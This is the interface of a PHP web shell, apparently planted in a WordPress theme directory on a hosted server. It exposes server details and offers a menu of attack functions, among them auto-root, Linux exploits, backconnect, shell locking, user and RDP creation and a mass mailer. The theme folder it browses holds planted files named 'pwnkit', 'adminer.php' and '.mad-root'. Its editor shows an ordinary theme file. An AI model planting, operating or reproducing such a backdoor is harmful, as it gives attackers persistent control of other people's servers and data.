Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
always /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
custom-functions.php
69.78
KB
-rw-r--r--
metabox.php
18.83
KB
-rw-r--r--
pagination.php
7.78
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
single-related-posts.php
4.59
KB
-rw-r--r--
template-tags.php
14.37
KB
-rw-r--r--
term-meta.php
4.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : term-meta.php
<?php if( !function_exists('always_custom_taxonomy_field') ): // Add term page function always_custom_taxonomy_field(){ // this will add the custom meta field to the add new term page ?> <div class="form-field"> <label><?php esc_html_e('Feature Image', 'always'); ?></label> <div class="twp-img-fields-wrap"> <div class="attachment-media-view"> <div class="twp-img-fields-wrap"> <div class="twp-attachment-media-view"> <div class="twp-attachment-child twp-uploader"> <button type="button" class="twp-img-upload-button"> <span class="dashicons dashicons-upload twp-icon twp-icon-large"></span> </button> <input class="upload-id" name="twp-term-featured-image" type="hidden"/> </div> <div class="twp-attachment-child twp-thumbnail-image"> <button type="button" class="twp-img-delete-button"> <span class="dashicons dashicons-no-alt twp-icon"></span> </button> <div class="twp-img-container"> </div> </div> </div> </div> </div> </div> </div> <?php } endif; add_action('category_add_form_fields', 'always_custom_taxonomy_field', 10, 2); if( !function_exists('always_taxonomy_edit_meta_field') ): // Edit term page function always_taxonomy_edit_meta_field($term){ $twp_term_image = get_term_meta( $term->term_id, 'twp-term-featured-image', true ); ?> <tr> <th scope="row" valign="top"><label><?php esc_html_e('Feature Image', 'always'); ?></label></th> <td> <div class="twp-img-fields-wrap"> <div class="attachment-media-view"> <div class="twp-img-fields-wrap"> <div class="twp-attachment-media-view"> <div class="twp-attachment-child twp-uploader"> <button type="button" class="twp-img-upload-button"> <span class="dashicons dashicons-upload twp-icon twp-icon-large"></span> </button> <input class="upload-id" name="twp-term-featured-image" type="hidden" value="<?php echo esc_url( $twp_term_image ); ?>"/> </div> <div class="twp-attachment-child twp-thumbnail-image"> <button type="button" class="twp-img-delete-button <?php if( $twp_term_image ) { echo 'twp-img-show'; } ?>"> <span class="dashicons dashicons-no-alt twp-icon"></span> </button> <div class="twp-img-container"> <?php if( $twp_term_image ){ ?> <img src="<?php echo esc_url( $twp_term_image ); ?>" style="width:200px;height:auto;"> <?php } ?> </div> </div> </div> </div> </div> </div> </td> </tr> <?php } endif; add_action('category_edit_form_fields', 'always_taxonomy_edit_meta_field', 10, 2); if( !function_exists('save_taxonomy_color_class_meta') ): // Save extra taxonomy fields callback function. function save_taxonomy_color_class_meta( $term_id ){ if( isset( $_POST['twp-term-featured-image'] ) ){ update_term_meta( $term_id, 'twp-term-featured-image', esc_url_raw( wp_unslash( $_POST[ 'twp-term-featured-image' ] ) ) ); } } endif; add_action('edited_category', 'save_taxonomy_color_class_meta', 10, 2); add_action('create_category', 'save_taxonomy_color_class_meta', 10, 2);
Close